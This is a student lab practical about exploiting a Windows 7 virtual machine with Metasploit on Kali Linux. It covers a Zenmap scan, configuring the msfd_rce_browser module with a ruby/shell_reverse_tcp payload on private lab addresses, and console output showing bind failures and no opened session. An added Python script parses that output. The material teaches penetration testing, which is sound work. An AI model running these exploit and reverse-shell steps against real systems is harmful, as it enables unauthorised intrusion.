Practical No 10

The document discusses using Metasploit on Kali Linux to exploit a Windows 7 virtual machine. It performs an Nmap scan to find TCP services on the target, then uses the msfd_rce_browser exploit module against the browser. Options such as the payload, listen address, and port are set. The exploit is run, starting a reverse TCP handler to receive the payload connection.

Uploaded by

Praveen Mishra
Copyright: © All Rights Reserved

Practical No 10

Metasploit using Kali Linux

Start Metasploit in Kali Linux.
In the background, start the Windows 7 virtual machine. Open Internet Explorer and open google.com.
On the Kali Linux machine, open Zenmap, type the target machine's IP address, and run an intense scan to explore the services to attack.
We found TCP services.
Inside Metasploit:
msf> search tcp
Then we will find lots of exploits. We have chosen the following one:
msf > use exploit/multi/browser/msfd_rce_browser
msf exploit(multi/browser/msfd_rce_browser) > show options

Module options (exploit/multi/browser/msfd_rce_browser):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   REMOTE_IP    127.0.0.1        yes       Remote IP address when called from victim
   REMOTE_PORT  55554            yes       Remote port the service is running at
   SRVHOST      0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT      8080             yes       The local port to listen on.
   SSL          false            no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                       no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(multi/browser/msfd_rce_browser) > set srvport 1244
srvport => 1244
msf exploit(multi/browser/msfd_rce_browser) > show options

Module options (exploit/multi/browser/msfd_rce_browser):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   REMOTE_IP    127.0.0.1        yes       Remote IP address when called from victim
   REMOTE_PORT  55554            yes       Remote port the service is running at
   SRVHOST      0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT      1244             yes       The local port to listen on.
   SSL          false            no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                       no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(multi/browser/msfd_rce_browser) > set ssl true
ssl => true
msf exploit(multi/browser/msfd_rce_browser) > show payloads

Compatible Payloads
===================

   Name                        Disclosure Date  Rank    Description
   ----                        ---------------  ----    -----------
   generic/custom                               normal  Custom Payload
   generic/shell_bind_tcp                       normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                    normal  Generic Command Shell, Reverse TCP Inline
   ruby/shell_bind_tcp                          normal  Ruby Command Shell, Bind TCP
   ruby/shell_bind_tcp_ipv6                     normal  Ruby Command Shell, Bind TCP IPv6
   ruby/shell_reverse_tcp                       normal  Ruby Command Shell, Reverse TCP
   ruby/shell_reverse_tcp_ssl                   normal  Ruby Command Shell, Reverse TCP SSL

msf exploit(multi/browser/msfd_rce_browser) > set payload ruby/shell_reverse_tcp
payload => ruby/shell_reverse_tcp
msf exploit(multi/browser/msfd_rce_browser) > show options

Module options (exploit/multi/browser/msfd_rce_browser):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   REMOTE_IP    127.0.0.1        yes       Remote IP address when called from victim
   REMOTE_PORT  55554            yes       Remote port the service is running at
   SRVHOST      192.168.43.27    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT      1244             yes       The local port to listen on.
   SSL          true             no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                       no        The URI to use for this exploit (default is random)

Payload options (ruby/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.43.26    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(multi/browser/msfd_rce_browser) > set lhost 192.168.43.1
lhost => 192.168.43.1
msf exploit(multi/browser/msfd_rce_browser) > exploit
[*] Exploit running as background job 1.

[-] Handler failed to bind to 192.168.43.1:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
msf exploit(multi/browser/msfd_rce_browser) > [-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (192.168.43.27:1244).
Interrupt: use the 'exit' command to quit
msf exploit(multi/browser/msfd_rce_browser) > set srvhost 192.168.43.26
srvhost => 192.168.43.26
msf exploit(multi/browser/msfd_rce_browser) > exploit
[*] Exploit running as background job 2.

[-] Handler failed to bind to 192.168.43.1:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
msf exploit(multi/browser/msfd_rce_browser) > [*] Using URL: https://192.168.43.26:1244/h1qbTZ
[*] Server started.
ls -a
[*] exec: ls -a

.
..
.bash_history
.bashrc
.BurpSuite
.cache
.config
Desktop
Documents
Downloads
.gnupg
.ICEauthority
.java
.local
.mozilla
.msf4
Music
.mysql_history
Pictures
.profile
Public
.rnd
Templates
.vboxclient-clipboard.pid
.vboxclient-display.pid
.vboxclient-draganddrop.pid
.vboxclient-seamless.pid
Videos
.viminfo
.zenmap
msf exploit(multi/browser/msfd_rce_browser) >
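
Added example, not part of the original practical: a small Python reader for the console output above. It shows what the transcript actually records: bind failures on 192.168.43.1:4444 and 192.168.43.27:1244, a handler that fell back to 0.0.0.0:4444, and `ls -a` executed by msfconsole on the local Kali machine (`[*] exec:`), with no session-opened line. The `session N opened` pattern is an assumption based on the usual msfconsole wording, since no such line appears on this page.

```python
import re

# Constructed sample: console lines copied from the transcript on this page
# (wrapped lines joined, prompts removed).
TRANSCRIPT = """\
[*] Exploit running as background job 1.
[-] Handler failed to bind to 192.168.43.1:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (192.168.43.27:1244).
[*] Exploit running as background job 2.
[-] Handler failed to bind to 192.168.43.1:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Using URL: https://192.168.43.26:1244/h1qbTZ
[*] Server started.
[*] exec: ls -a
"""

# (event kind, pattern); the first matching pattern decides the kind of a line.
PATTERNS = [
    ("bind_failed", re.compile(r"failed to bind to (\d+\.\d+\.\d+\.\d+:\d+)", re.I)),
    ("bind_failed", re.compile(r"Rex::BindFailed.*\((\d+\.\d+\.\d+\.\d+:\d+)\)")),
    ("handler_started", re.compile(r"Started reverse TCP handler on (\S+)")),
    ("server_url", re.compile(r"Using URL:\s*(\S+)")),
    ("local_exec", re.compile(r"^\[\*\] exec: (.+)$")),  # ran on the local host
    ("session_opened", re.compile(r"session (\d+) opened", re.I)),  # assumed wording
]

def classify(transcript):
    """Return (kind, value) for every console line that matches a pattern."""
    events = []
    for line in transcript.splitlines():
        for kind, rx in PATTERNS:
            match = rx.search(line)
            if match:
                events.append((kind, match.group(1)))
                break
    return events

def summarize(transcript):
    """Group events by kind and report whether any session was opened."""
    summary = {}
    for kind, value in classify(transcript):
        summary.setdefault(kind, []).append(value)
    summary["session_obtained"] = bool(summary.get("session_opened"))
    return summary

if __name__ == "__main__":
    print(summarize(TRANSCRIPT))
```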
